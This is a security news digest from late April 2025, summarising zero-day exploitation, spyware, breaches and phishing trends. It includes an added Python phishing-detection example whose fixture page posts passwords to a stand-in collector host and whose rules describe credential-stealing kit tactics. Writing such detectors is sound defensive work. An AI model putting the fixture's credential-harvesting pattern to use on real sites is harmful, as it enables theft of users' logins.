    Autosummary: Pierluigi Paganini, April 25, 2025. Researchers identified a new malware, named DslogdRAT, deployed after exploiting a now-patched flaw in Ivanti Connect Secure (ICS). "


    SAP NetWeaver zero-day allegedly exploited by an initial access broker

    exploits
    2025-04-25 https://securityaffairs.com/176983/hacking/sap-netweaver-zero-day-allegedly-exploited-by-an-initial-access-broker.html
    A zero-day in SAP NetWeaver is potentially being exploited, putting thousands of internet-facing applications at risk. Researchers warn that a zero-day vulnerability, tracked as CVE-2025-31324 (CVSS score of 10/10), in SAP NetWeaver is potentially being exploited. Thousands of internet-facing applications are potentially at risk. The flaw in SAP NetWeaver Visual Composer Metadata Uploader stems from a lack […] "

    Autosummary: Pierluigi Paganini, April 25, 2025. A zero-day in SAP NetWeaver is potentially being exploited, putting thousands of internet-facing applications at risk. “On April 22, 2025, ReliaQuest published an investigation into exploitation activity targeting SAP NetWeaver systems, uncovering a critical vulnerability later identified by SAP as ‘CVE-2025-31324’ with a severity score of 10,” reads the report published by ReliaQuest. "


    Craft CMS RCE exploit chain used in zero-day attacks to steal data

    exploits
    2025-04-25 https://www.bleepingcomputer.com/news/security/craft-cms-rce-exploit-chain-used-in-zero-day-attacks-to-steal-data/
    Two vulnerabilities impacting Craft CMS were chained together in zero-day attacks to breach servers and steal data, with exploitation ongoing, according to CERT Orange Cyberdefense. [...] "

    Autosummary: As part of the investigation, they discovered that two zero-day vulnerabilities impacting Craft CMS were exploited to breach the server: CVE-2025-32432: A remote code execution (RCE) vulnerability in Craft CMS. "


    Binarly Transparency Platform 3.0 prioritizes vulnerabilities based on active exploitation

    exploits
    2025-04-24 https://www.helpnetsecurity.com/2025/04/24/binarly-transparency-platform-3-0/

    Binarly announced the rollout of its flagship Binarly Transparency Platform 3.0, a major update that fuses live threat‑intelligence signals with an exploitation‑aware scoring system to help enterprise teams prioritize the mitigation of vulnerabilities with the most immediate risk. The release introduces Threat Intelligence Monitoring, a service that tracks public proof‑of‑concept code, ransomware activity, and private telemetry to flag actively exploited flaws the moment they surface. These signals feed a new Exploitation Maturity Score (EMS) that … More

    The post Binarly Transparency Platform 3.0 prioritizes vulnerabilities based on active exploitation appeared first on Help Net Security.

    "

    Autosummary: "


    A new era of cyber threats is approaching for the energy sector

    industry
    2025-04-24 https://www.helpnetsecurity.com/2025/04/24/energy-sector-cyber-threats/

    Cyber threats targeting the energy sector come in many forms, including state-sponsored actors seeking to disrupt national infrastructure, cybercriminals motivated by profit, and insiders intentionally causing damage. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). Email as the initial attack vector As seen … More

    The post A new era of cyber threats is approaching for the energy sector appeared first on Help Net Security.

    "

    Autosummary: Email as the initial attack vector As seen in cases from both the US and UK, and across energy customers of all types, 55% of incidents involved email or SaaS, making it the most frequent attack vector. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). "


    Review: Artificial Intelligence for Cybersecurity

    ciber
    2025-04-24 https://www.helpnetsecurity.com/2025/04/24/review-artificial-intelligence-for-cybersecurity/

    Artificial Intelligence for Cybersecurity is a practical guide to how AI and machine learning are changing the way we defend digital systems. The book aims to explain how AI can help solve real cybersecurity problems. It does that well, but it’s not for everyone. About the authors Bojan Kolosnjaji is a principal engineer and researcher specializing in AI-driven anomaly detection and large-scale cybersecurity analytics, with a PhD from TUM. Xiao Huang is a Stanford visiting … More

    The post Review: Artificial Intelligence for Cybersecurity appeared first on Help Net Security.

    "

    Autosummary: At the same time, they do a good job warning readers about the risks: bias, hallucinations, bad data, and unrealistic expectations. "


    Android spyware hidden in mapping software targets Russian soldiers

    rusia-ucrania
    2025-04-24 https://securityaffairs.com/176886/malware/android-spyware-hidden-in-mapping-software-targets-russian-soldiers.html
    A new Android spyware was discovered in a fake Alpine Quest app, reportedly used by Russian soldiers for war zone planning. Doctor Web researchers uncovered a new spyware, tracked as Android.Spy.1292.origin, targeting Russian military personnel. The malicious code was hidden in a trojanized Alpine Quest app and spread via Russian Android catalogs. The malware steals […] "

    Autosummary: Each time the app is launched, the trojan silently gathers and transmits data such as the user’s phone number, accounts, contact list, current date, geolocation, stored file details, and the app version to a command-and-control server. "


    Exposed and unaware: The state of enterprise security in 2025

    government
    2025-04-24 https://www.helpnetsecurity.com/2025/04/24/edgescan-2025-vulnerability-statistics-report/

    The Edgescan 2025 Vulnerability Statistics Report offers a data-rich snapshot of the global cybersecurity landscape, drawing from thousands of assessments and penetration tests conducted in 2024. Now in its 10th year, the report analyzes full-stack security trends across industries, highlighting common vulnerabilities, patching delays, and risk hotspots. With insights into exploit availability, attack surface exposure, and remediation timelines, it equips organizations with the data they need to make smarter, risk-based decisions. The report highlights a … More

    The post Exposed and unaware: The state of enterprise security in 2025 appeared first on Help Net Security.

    "

    Autosummary: Now in its 10th year, the report analyzes full-stack security trends across industries, highlighting common vulnerabilities, patching delays, and risk hotspots. "


    Interlock ransomware claims DaVita attack, leaks stolen data

    exploits ransomware
    2025-04-24 https://www.bleepingcomputer.com/news/security/interlock-ransomware-claims-davita-attack-leaks-stolen-data/
    The Interlock ransomware gang has claimed the cyberattack on DaVita kidney dialysis firm and leaked data allegedly stolen from the organization. [...] "

    Autosummary: According to the gang's claim, they have around 1.5 terabytes of data from the healthcare company, or nearly 700,000 files of what appear to be sensitive patient records, information on user accounts, insurance, and even financial details. "


    Yale New Haven Health data breach affects 5.5 million patients

    financial
    2025-04-24 https://www.bleepingcomputer.com/news/security/yale-new-haven-health-data-breach-affects-55-million-patients/
    Yale New Haven Health (YNHHS) is warning that threat actors stole the personal data of 5.5 million patients in a cyberattack earlier this month. [...] "

    Autosummary: "


    Microsoft fixes bug causing incorrect 0x80070643 WinRE errors

    exploits
    2025-04-24 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-causing-incorrect-0x80070643-winre-errors/
    Microsoft says it resolved a known issue causing erroneous 0x80070643 installation failure errors when deploying the April 2025 Windows Recovery Environment (WinRE) updates. [...] "

    Autosummary: "


    Linux "io_uring" security blindspot allows stealthy rootkit attacks

    Linux
    2025-04-24 https://www.bleepingcomputer.com/news/security/linux-io-uring-security-blindspot-allows-stealthy-rootkit-attacks/
    A significant security gap in Linux runtime security caused by the "io_uring" interface allows rootkits to operate undetected on systems while bypassing advanced Enterprise security software. [...] "

    Autosummary: Figure caption: io_uring task submission and completion rings (source: Donald Hunter). The problem, according to ARMO, arises from the fact that most security tools monitor for suspicious syscalls and hooking (like "ptrace" or "seccomp"), completely ignoring anything that involves io_uring, creating a very dangerous blind spot. "


    Android malware turns phones into malicious tap-to-pay machines

    exploits
    2025-04-24 https://www.malwarebytes.com/blog/news/2025/04/android-malware-turns-phones-into-malicious-tap-to-pay-machines
    A newly discovered malicious program effectively turns Android phones into malicious tap machines that vacuum up payment card data. "

    Autosummary: From there, they persuade the victim to remove the spending limits on their card, and then to install what they claim is a security application, sent to their phone as a link. The malware, which cybersecurity company Cleafy calls SuperCard X, uses a feature now found in most Android phones: near-field communication (NFC). The attacker, who by now will likely have built up a rapport with the victim, will ask them to tap their card to their phone. "


    Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028)

    exploits
    2025-04-24 https://www.helpnetsecurity.com/2025/04/24/critical-commvault-rce-vulnerability-fixed-poc-available-cve-2025-34028/

    If your organization is using Commvault Command Center for your data protection, backup creation, configuration and restoration needs, you should check whether your on-premise installation has been upgraded to patch a critical vulnerability (CVE-2025-34028) that could allow unauthenticated remote code execution. About CVE-2025-34028 CVE-2025-34028 is a path traversal vulnerability affecting Commvault Command Center (Innovation Release) versions from 11.38.0 to 11.38.19, on Windows and Linux. It was unearthed by watchTowr researcher Sonny Macdonald, who discovered an … More

    The post Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) appeared first on Help Net Security.

    "

    Autosummary: "


    Lazarus Hits 6 South Korean Firms via Cross EX, Innorix Zero-Day and ThreatNeedle Malware

    exploits
    2025-04-24 https://thehackernews.com/2025/04/lazarus-hits-6-south-korean-firms-via.html
    At least six organizations in South Korea have been targeted by the prolific North Korea-linked Lazarus Group as part of a campaign dubbed Operation SyncHole. The activity targeted South Korea's software, IT, financial, semiconductor manufacturing, and telecommunications industries, according to a report from Kaspersky published today. The earliest evidence of compromise was first detected in "

    Autosummary: The activity targeted South Korea's software, IT, financial, semiconductor manufacturing, and telecommunications industries, according to a report from Kaspersky published today. "


    Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools

    Linux
    2025-04-24 https://thehackernews.com/2025/04/linux-iouring-poc-rootkit-bypasses.html
    Cybersecurity researchers have demonstrated a proof-of-concept (PoC) rootkit dubbed Curing that leverages a Linux asynchronous I/O mechanism called io_uring to bypass traditional system call monitoring. This causes a "major blind spot in Linux runtime security tools," ARMO said. "This mechanism allows a user application to perform various actions without using system calls," the company said in "

    Autosummary: "On the one hand, you need visibility into system calls; on the other, you need access to kernel structures and sufficient context to detect threats effectively," Amit Schendel, Head of Security Research at ARMO, said. "


    159 CVEs Exploited in Q1 2025 — 28.3% Within 24 Hours of Disclosure

    exploits
    2025-04-24 https://thehackernews.com/2025/04/159-cves-exploited-in-q1-2025-283.html
    As many as 159 CVE identifiers have been flagged as exploited in the wild in the first quarter of 2025, up from 151 in Q4 2024. "We continue to see vulnerabilities being exploited at a fast pace with 28.3% of vulnerabilities being exploited within 1-day of their CVE disclosure," VulnCheck said in a report shared with The Hacker News. This translates to 45 security flaws that have been weaponized "

    Autosummary: The breakdown is as follows: Content Management Systems (CMS) (35), Network Edge Devices (29), Operating Systems (24), Open Source Software (14), Server Software (14). The leading vendors and their products that were exploited during the time period are Microsoft Windows (15), Broadcom VMware (6), Cyber PowerPanel (5), Litespeed Technologies (4), and TOTOLINK Routers (4). "


    Darcula Adds GenAI to Phishing Toolkit, Lowering the Barrier for Cybercriminals

    financial ciber
    2025-04-24 https://thehackernews.com/2025/04/darcula-adds-genai-to-phishing-toolkit.html
    The threat actors behind the Darcula phishing-as-a-service (PhaaS) platform have released new updates to their cybercrime suite with generative artificial intelligence (GenAI) capabilities. "This addition lowers the technical barrier for creating phishing pages, enabling less tech-savvy criminals to deploy customized scams in minutes," Netcraft said in a fresh report shared with The Hacker News. "

    Autosummary: "


    Crooks exploit the death of Pope Francis

    exploits
    2025-04-24 https://securityaffairs.com/176917/cyber-crime/crooks-exploit-the-death-of-pope-francis.html
    Crooks exploit the death of Pope Francis, using public curiosity and emotion to launch scams and spread malware, an old tactic during global events. After Pope Francis’ death, cybercriminals launched scams and malware attacks, exploiting public curiosity, grief, and confusion. Cybercriminals are ready to exploit any event of global interest; it has already happened in […] "

    Autosummary: Pierluigi Paganini, April 24, 2025. Crooks exploit the death of Pope Francis, using public curiosity and emotion to launch scams and spread malware, an old tactic during global events. Hidden malware and data harvesting: some malicious sites run hidden scripts that silently gather device names, OS, geolocation, and more data, later sold on the dark web or used for phishing attacks. Threat actors used malware to steal login credentials, financial information, and personal files. "


    Microsoft fixes machine learning bug flagging Adobe emails as spam

    exploits
    2025-04-24 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-machine-learning-bug-flagging-adobe-emails-as-spam/
    Microsoft says it mitigated a known issue in one of its machine learning (ML) models that mistakenly flagged Adobe emails in Exchange Online as spam. [...] "

    Autosummary: "


    Frederick Health data breach impacts nearly 1 million patients

    financial
    2025-04-24 https://www.bleepingcomputer.com/news/security/frederick-health-data-breach-impacts-nearly-1-million-patients/
    A ransomware attack in January at Frederick Health Medical Group, a major healthcare provider in Maryland, has led to a data breach affecting nearly one million patients. [...] "

    Autosummary: "


    Zoom attack tricks victims into allowing remote access to install malware and steal money

    financial exploits
    2025-04-24 https://www.malwarebytes.com/blog/news/2025/04/zoom-attack-tricks-victims-into-allowing-remote-access-to-install-malware-and-steal-money
    Attackers are luring victims into a Zoom call and then taking over their PC to install malware, infiltrate their accounts, and steal their assets. "

    Autosummary: “While the interview was ongoing @tacticalinvest_ was downloading malware on my computer known as goopdate,” he reports, “which was powerful enough to steal >$100k in digital assets from my Bitcoin and Ethereum wallets, as well as log into my twitter, gmail, and other accounts.” As he describes in a postmortem thread on X earlier this month, he also got a media invitation from an X account, this time called @tacticalinvest_, to appear on a podcast. "


    Yale New Haven Health (YNHHS) data breach impacted 5.5 million patients

    financial
    2025-04-24 https://securityaffairs.com/176937/data-breach/yale-new-haven-health-ynhhs-data-breach-impacted-5-5-million-patients.html
    Yale New Haven Health (YNHHS) announced that threat actors stole the personal data of 5.5 million patients in a cyberattack. Yale New Haven Health (YNHHS) disclosed a data breach that exposed personal information of 5.5 million patients following a cyberattack that occurred earlier this month. Yale New Haven Health System (YNHHS) is a nonprofit healthcare […] "

    Autosummary: The stolen data varies by patient and includes the following info: full name, date of birth, home address, telephone number, email address, race/ethnicity, Social Security number (SSN), patient type, and medical record number. It was clarified that the exposure did not include financial information, medical records, or treatment details. "


    Health of Brazil's ex-president Bolsonaro has worsened, doctors say

    latam
    2025-04-24 https://www.bbc.com/news/articles/cy9v1lq1ndgo
    The 70-year-old, who remains in intensive care, underwent intestinal surgery earlier this month - and currently faces coup charges. "

    Autosummary: "


    When confusion becomes a weapon: How cybercriminals exploit economic turmoil

    exploits ciber
    2025-04-23 https://www.helpnetsecurity.com/2025/04/23/economic-uncertainty-cybersecurity/

    It begins with a simple notification: “Markets in Free Fall.” Within moments, the headlines multiply: new tariffs, emergency actions, plummeting consumer confidence. Across boardrooms and break rooms, anxiety ripples at every level. People begin refreshing inboxes and apps for guidance from leadership teams, advisors, and experts. Right there, buried among legitimate memos and updates, the attacker slips in. A fake social media message. A bogus government alert. An urgent vendor notification that looks just convincing … More

    The post When confusion becomes a weapon: How cybercriminals exploit economic turmoil appeared first on Help Net Security.

    "

    Autosummary: Threat actors impersonate officials, executives, and advisors, knowing that all they need is the illusion of authority in a moment of uncertainty. Within moments, the headlines multiply: new tariffs, emergency actions, plummeting consumer confidence. Defending effectively means thinking tactically, staying adaptive, and treating clarity as a strategic asset. "


    The dark side of YouTube: Malicious links, phishing, and deepfakes

    financial
    2025-04-23 https://www.helpnetsecurity.com/2025/04/23/most-common-youtube-scams/

    With billions of users, YouTube has become a tempting target for cybercriminals. They post malicious links in video descriptions and comments. Some send phishing emails to creators, posing as sponsors but attaching malware. Others hijack popular channels to promote fake cryptocurrency giveaways. Deepfake videos have entered the mix, using AI to impersonate well-known public figures. This article looks at the most common scams found on YouTube and how they work. Malware in video descriptions and … More

    The post The dark side of YouTube: Malicious links, phishing, and deepfakes appeared first on Help Net Security.

    "

    Autosummary: But if platforms were held responsible for everything, they might over-censor to avoid potential liability, which could impact the diversity of content users see. But it also helps scan content, find patterns, and flag suspicious behavior. With its sophistication, it floods channels with deepfakes and AI-generated content, making it harder to tell what’s real and what’s fake. "


    Phishing emails delivering infostealers surge 84%

    financial
    2025-04-23 https://www.helpnetsecurity.com/2025/04/23/cybercriminals-credential-theft-tactics/

    Cybercriminals continued to shift to stealthier tactics, with lower-profile credential theft spiking, while ransomware attacks on enterprises declined, according to IBM. Researchers observed an 84% increase in emails delivering infostealers in 2024 compared to the prior year, a method threat actors relied heavily on to scale identity attacks. 70% of attacks in 2024 involved critical infrastructure. In this subset, the use of valid accounts made up 31% of initial access vectors, followed by phishing and … More

    The post Phishing emails delivering infostealers surge 84% appeared first on Help Net Security.

    "

    Autosummary: As a result of these takedowns, we have seen increased diversification and turnover in the malware activity of actors associated with cybercrime groups such as ITG23 (Wizard Spider, TrickBot Group), ITG25 (Lunar Spider, IcedID), and ITG26 (Qakbot, Pikabot). The most common actions on objective included tool-remote access (17%), malware-backdoor (17%), and server access (13%), signaling attackers’ focus on system control and data exfiltration. "


    Cybersecurity jobs available right now: April 23, 2025

    ciber
    2025-04-23 https://www.helpnetsecurity.com/2025/04/23/cybersecurity-jobs-available-right-now-april-23-2025/

    Application Security Analyst Greenway Health | India | Remote – View job details As an Application Security Analyst, you will conduct regular security assessments of applications, including static and dynamic analysis, to identify vulnerabilities in code, configurations, and third-party dependencies. Ensure application security practices comply with healthcare regulations and industry standards. Manage and configure vulnerability scanning and security testing tools to maximize coverage and efficiency. Application Security Engineer ControlUp | Israel | Hybrid – View … More

    The post Cybersecurity jobs available right now: April 23, 2025 appeared first on Help Net Security.

    "

    Autosummary: Establish, implement, and monitor policies, standards, systems, and controls to ensure appropriate confidentiality, integrity, availability, safety, privacy, and recovery of information assets owned, managed, and processed by the organization. Penetration Tester PwC | Italy | Hybrid – View job details. As a Penetration Tester, you will be looking for security vulnerabilities on web applications, infrastructure systems, network equipment, Wi-Fi systems, mobile applications, APIs, etc. Provide review and consultation to risk initiatives, events, incidents, controls and applied risk mitigation strategies. Senior Incident Response Coordinator Northwave Cyber Security | Germany | On-site – View job details. As a Senior Incident Response Coordinator, you will oversee the execution of incident response plans, manage resources, and guide teams through the lifecycle of cybersecurity incidents. Cyber Security Specialist Hisense | Slovenia | On-site – View job details. As a Cyber Security Specialist, you will be responsible for the implementation, configuration, management, and maintenance of cybersecurity systems, as well as the optimization of existing systems. "


    Chinese Cybercriminals Released Z-NFC Tool for Payment Fraud

    ciber
    2025-04-23 https://securityaffairs.com/176829/cyber-crime/chinese-cybercriminals-released-z-nfc-tool-for-payment-fraud.html
    Cybercriminals leverage NFC fraud against ATMs and POS terminals, stealing money from consumers at scale. Resecurity (USA) investigated multiple incidents identified in Q1 2025, exceeding several million dollars in damages for one of the top Fortune 100 financial institutions in the United States due to NFC fraud. Stopping cybercriminals operating from China presents significant challenges […] "

    Autosummary: In one such instance, cybercriminals specifically focused on fraud automation against Barclays, Bank of Scotland, Lloyds Banking Group, Halifax, HSBC, Santander, Wise and Revolut. "


    ASUS releases fix for AMI bug that lets hackers brick servers

    exploits
    2025-04-23 https://www.bleepingcomputer.com/news/security/asus-releases-fix-for-ami-bug-that-lets-hackers-brick-servers/
    ASUS has released security updates to address CVE-2024-54085, a maximum severity flaw that could allow attackers to hijack and potentially brick servers. [...] "

    Autosummary: "


    Phishing detection is broken: Why most attacks feel like a zero day

    financial exploits
    2025-04-23 https://www.bleepingcomputer.com/news/security/phishing-detection-is-broken-why-most-attacks-feel-like-a-zero-day/
    Phishing attacks now evade email filters, proxies, and MFA — making every attack feel like a zero-day. This article from Push Security breaks down why detection is failing and how real-time, in-browser analysis can help turn the tide. [...] "

    Autosummary: In any case, while modern email solutions can bring a lot more to the table, neither email- nor network (proxy)-based tools can definitively know that a page is malicious unless they can access the page and analyze it. Attackers are preventing their pages from being analyzed: both email- and network (proxy)-based solutions rely on being able to inspect and analyze a page to identify whether it is malicious or not, after which IoCs are generated that can be enforced when a link is clicked (or received in your email inbox). A key challenge with phishing detection is that, based on the indicators that we as an industry commonly use to detect phishing pages, pretty much every phishing attack looks different and uses a unique combination of domain, URL, IPs, page composition, target app, etc. Getting real-time visibility of page/user behavior and malicious toolkits running on the page is key to moving to TTP-based detections, rather than chasing quickly-changing IoCs. The future of phishing detection and response is browser based: Push Security provides a browser-based identity security solution that intercepts phishing attacks as they happen, in employee browsers. To detect and block a phishing page, it needs to be used in an attack first. Protect and defend your identity attack surface with Push Security: book a demo to see how Push's browser-based identity security platform prevents account takeover attacks like MFA-bypass phishing, credential stuffing, password spraying, and session hijacking. Book a demo or try it for free. Why most phishing attacks are completely novel: attackers know that phishing detection and blocking relies on blocklisting IoCs like domains, URLs and IPs, is situated at the email and network layer, and requires that a page is accessed and analyzed before it can be blocked. These methods have remained practically unchanged for more than a decade. With MFA-bypassing phishing kits the new normal, capable of phishing accounts protected by SMS, OTP, and push-based methods, detection controls are being put under constant pressure as prevention controls fall short. "


    Armis expands vulnerability exposure and assessment capabilities

    exploits
    2025-04-23 https://www.helpnetsecurity.com/2025/04/23/armis-vulnerability-intelligence-database/

    Armis is expanding its vulnerability exposure and assessment capabilities with the free availability of the Armis Vulnerability Intelligence Database. The community-driven database integrates exploited vulnerabilities, emerging threats and AI-powered insights, providing the cybersecurity industry with the knowledge organizations need to better prioritize and mitigate threats in real time. The Armis Vulnerability Intelligence Database is powered by Armis Labs, Armis early warning capabilities and the Armis Asset Intelligence Engine. It also receives information from Armis Centrix … More

    The post Armis expands vulnerability exposure and assessment capabilities appeared first on Help Net Security.

    "

    Autosummary: The community-driven database integrates exploited vulnerabilities, emerging threats and AI-powered insights, providing the cybersecurity industry with the knowledge organizations need to better prioritize and mitigate threats in real time. "


    NinjaOne unifies vulnerability and patch management

    exploits
    2025-04-23 https://www.helpnetsecurity.com/2025/04/23/ninjaone-vulnerability-remediation-tools/

    NinjaOne announced new capabilities that unify vulnerability management and patching workflows, ensuring a risk-based approach to patching and reducing time to remediate vulnerabilities. The new tools automate the import of vulnerability data, giving IT teams continuous visibility into vulnerabilities, so they can prioritize and verify the successful application of patches, reducing organizations’ risk. “The rapid growth in the number and diversity of endpoint devices, driven by hybrid work and digital transformation, has significantly expanded organizational attack … More

    The post NinjaOne unifies vulnerability and patch management appeared first on Help Net Security.

    "

    Autosummary: Additionally, because NinjaOne provides centralized visibility in a single console, IT teams can consider vulnerability data, manage patch administration, as well as leverage AI-driven patch sentiment to prioritize what matters. "


    2025 Data Breach Investigations Report: Third-party breaches double

    financial
    2025-04-23 https://www.helpnetsecurity.com/2025/04/23/verizon-2025-data-breach-investigations-report-dbir/

    The exploitation of vulnerabilities has seen another year of growth as an initial access vector for breaches, reaching 20%, according to Verizon’s 2025 Data Breach Investigations Report. Researchers analyzed 22,052 real-world security incidents, of which 12,195 were confirmed data breaches. This was an increase of 34% in relation to last year’s report. The presence of ransomware, with or without encryption, saw significant growth, a 37% increase from last year’s report. It was present in 44% … More

    The post 2025 Data Breach Investigations Report: Third-party breaches double appeared first on Help Net Security.

    "

Autosummary: In addition to passwords (regardless of hash status), researchers found email addresses (61% of breaches), phone numbers (39%), government-issued IDs (22%) and even the occasional passport (1.8%). However, the context around vulnerabilities – where a given vulnerability exists in your environment, what data or systems are potentially at risk, ease of exploitation, the existence of a proof-of-concept, and so much more – drives informed prioritization and remediation. Although the involvement of the human element in breaches remained roughly the same as last year, hovering around 60%, the percentages of breaches where a third party was involved doubled, going from 15% to 30%. "


    Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign

    exploits
    2025-04-23 https://thehackernews.com/2025/04/iran-linked-hackers-target-israel-with.html
    The Iran-nexus threat actor known as UNC2428 has been observed delivering a backdoor known as MURKYTOUR as part of a job-themed social engineering campaign aimed at Israel in October 2024. Google-owned Mandiant described UNC2428 as a threat actor aligned with Iran that engages in cyber espionage-related operations. The intrusion set is said to have distributed the malware through a "complex "

    Autosummary: Assessed to be operating on behalf of the Iranian Ministry of Intelligence and Security (MOIS), the hacking group is known for targeting a wide range of industry verticals in Israel, including academia, tourism, communications, finance, transportation, healthcare, government, and technology. "


    Android Spyware Disguised as Alpine Quest App Targets Russian Military Devices

    rusia-ucrania
    2025-04-23 https://thehackernews.com/2025/04/android-spyware-disguised-as-alpine.html
    Cybersecurity researchers have revealed that Russian military personnel are the target of a new malicious campaign that distributes Android spyware under the guise of the Alpine Quest mapping software. "The attackers hide this trojan inside modified Alpine Quest mapping software and distribute it in various ways, including through one of the Russian Android app catalogs," Doctor Web said in an "

Autosummary: Collected data includes contact lists, current date and geolocation, information about stored files, and app version. Besides sending the victim's location every time it changes to a Telegram bot, the spyware supports the ability to download and run additional modules that allow it to exfiltrate files of interest, particularly those sent via Telegram and WhatsApp. "


    Three Reasons Why the Browser is Best for Stopping Phishing Attacks

    financial
    2025-04-23 https://thehackernews.com/2025/04/three-reasons-why-browser-is-best-for.html
    Phishing attacks remain a huge challenge for organizations in 2025. In fact, with attackers increasingly leveraging identity-based techniques over software exploits, phishing arguably poses a bigger threat than ever before.  Attackers are increasingly leveraging identity-based techniques over software exploits, with phishing and stolen credentials (a byproduct of phishing) now the primary "

Autosummary: But you get much better visibility of all this in the browser, with access to: full decrypted HTTP traffic, not just DNS and TCP/IP metadata; full user interaction tracing, so every click, keystroke or DOM change can be traced; full inspection at every layer of execution, not just the initial HTML served; and full access to browser APIs, to correlate with browser history, local storage, attached cookies, etc. Being in the browser enables you to build much more effective controls based on TTPs. And with this new visibility, because you're in the browser and seeing the page at the same time as the user is interacting with it, you can… #3: Intercept in real time, not post mortem. For non-browser solutions, real-time phishing detection is basically nonexistent. With MFA-bypassing phishing kits the new normal, capable of phishing accounts protected by SMS, OTP, and push-based methods, detection controls are being put under constant pressure as prevention controls fall short. But attackers know this, and are taking steps to avoid these controls, by routinely evading IoC-driven blocklists through dynamically rotating and updating commonly signatured elements like IPs, domains, and URLs. When endpoint attacks skyrocketed in the late 2000s / early 2010s, they took advantage of the fact that defenders were trying to detect malware with primarily network-based detections, signature-based analysis of files, and running files in sandboxes (which was reliably defeated with sandbox-aware malware and using things as simple as putting an execution delay in the code). "
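The argument above is that a browser-resident control can judge a page by what it does (where a password form posts, which brand it imitates, whether the login form appeared only after the page loaded) instead of by IPs, domains and URLs that a kit rotates. The following is an added example, not code from the article or from any vendor it mentions, of that kind of TTP scoring over a page model. The page model is a constructed stand-in for what a content script would read from the DOM, and the trusted-host and brand lists are hypothetical.

```python
"""Added example, not code from the article or from any vendor it mentions:
TTP-based phishing checks that need the rendered page, which is what a
browser-resident control sees and a network/IoC control does not.  The page
model is a constructed stand-in for what a content script would read from the
DOM; host and brand lists are hypothetical."""
from urllib.parse import urlparse

TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "sso.corp.example"}  # hypothetical
BRAND_KEYWORDS = {"microsoft", "office 365", "okta", "google"}            # hypothetical


def registrable_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels); a real control would use the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def assess_page(page: dict) -> dict:
    """Score one rendered page on behaviour rather than on IP/domain/URL indicators.

    page = {"url": str, "title": str, "text": str,
            "forms": [{"action": str, "has_password": bool}],
            "password_field_injected_after_load": bool}
    """
    origin_host = urlparse(page["url"]).hostname or ""
    findings = set()
    credential_forms = [f for f in page["forms"] if f["has_password"]]
    for form in credential_forms:
        # A relative action posts back to the page's own host.
        action_host = urlparse(form["action"]).hostname or origin_host
        if origin_host not in TRUSTED_LOGIN_HOSTS:
            findings.add("password_form_on_untrusted_host")
        if registrable_domain(action_host) != registrable_domain(origin_host):
            findings.add("credentials_posted_cross_domain")
    visible = (page["title"] + " " + page["text"]).lower()
    if origin_host not in TRUSTED_LOGIN_HOSTS and any(k in visible for k in BRAND_KEYWORDS):
        findings.add("brand_keywords_on_unrelated_domain")
    if credential_forms and page["password_field_injected_after_load"]:
        findings.add("login_form_assembled_at_runtime")  # typical of obfuscated kits
    verdict = "block" if len(findings) >= 2 else ("warn" if findings else "allow")
    return {"verdict": verdict, "findings": sorted(findings)}


# Constructed sample pages (not real sites).
PHISH_PAGE = {
    "url": "https://login-microsoft-secure.example-cdn.net/auth",
    "title": "Sign in to your Microsoft account",
    "text": "Enter your password to continue",
    "forms": [{"action": "https://collector.evil-example.org/post", "has_password": True}],
    "password_field_injected_after_load": True,
}
LEGIT_PAGE = {
    "url": "https://login.microsoftonline.com/common/oauth2/authorize",
    "title": "Sign in to your account",
    "text": "Microsoft",
    "forms": [{"action": "/common/login", "has_password": True}],
    "password_field_injected_after_load": False,
}

if __name__ == "__main__":
    for name, page in (("phish", PHISH_PAGE), ("legit", LEGIT_PAGE)):
        print(name, assess_page(page))
```

None of the four checks depends on the kit's hostname or IP, so rotating infrastructure does not clear it; the trade-off is that the trusted-host list has to be maintained, and a legitimate SSO page served from an unlisted host would produce a warn verdict.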


    Russian Hackers Exploit Microsoft OAuth to Target Ukraine Allies via Signal and WhatsApp

    exploits rusia-ucrania
    2025-04-23 https://thehackernews.com/2025/04/russian-hackers-exploit-microsoft-oauth.html
    Multiple suspected Russia-linked threat actors are "aggressively" targeting individuals and organizations with ties to Ukraine and human rights with an aim to gain unauthorized access to Microsoft 365 accounts since early March 2025. The highly targeted social engineering operations, per Volexity, are a shift from previously documented attacks that leveraged a technique known as device code "

    Autosummary: "These recently observed attacks rely heavily on one-on-one interaction with a target, as the threat actor must both convince them to click a link and send back a Microsoft-generated code," security researchers Charlie Gardner, Josh Duke, Matthew Meltzer, Sean Koessel, Steven Adair, and Tom Lancaster said in an exhaustive analysis. Volexity said it also observed an earlier iteration of the campaign that redirects users to the website "vscode-redirect.azurewebsites[.]net," which, in turn, redirects to the localhost IP address (127.0.0.1). "


    Russian army targeted by new Android malware hidden in mapping app

    exploits rusia-ucrania
    2025-04-23 https://www.bleepingcomputer.com/news/security/russian-army-targeted-by-new-android-malware-hidden-in-mapping-app/
    A new Android malware has been discovered hidden inside trojanized versions of the Alpine Quest mapping app, which is reportedly used by Russian soldiers as part of war zone operational planning. [...] "

Autosummary: Specifically, the spyware performs the following actions: sends the user's phone number, contacts, geolocation, file info, and app version to attackers. "


    DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack

    financial
    2025-04-23 https://thehackernews.com/2025/04/dprk-hackers-steal-137m-from-tron-users.html
Multiple threat activity clusters with ties to North Korea (aka Democratic People's Republic of Korea or DPRK) have been linked to attacks targeting organizations and individuals in the Web3 and cryptocurrency space. "The focus on Web3 and cryptocurrency appears to be primarily financially motivated due to the heavy sanctions that have been placed on North Korea," Google-owned Mandiant said in "

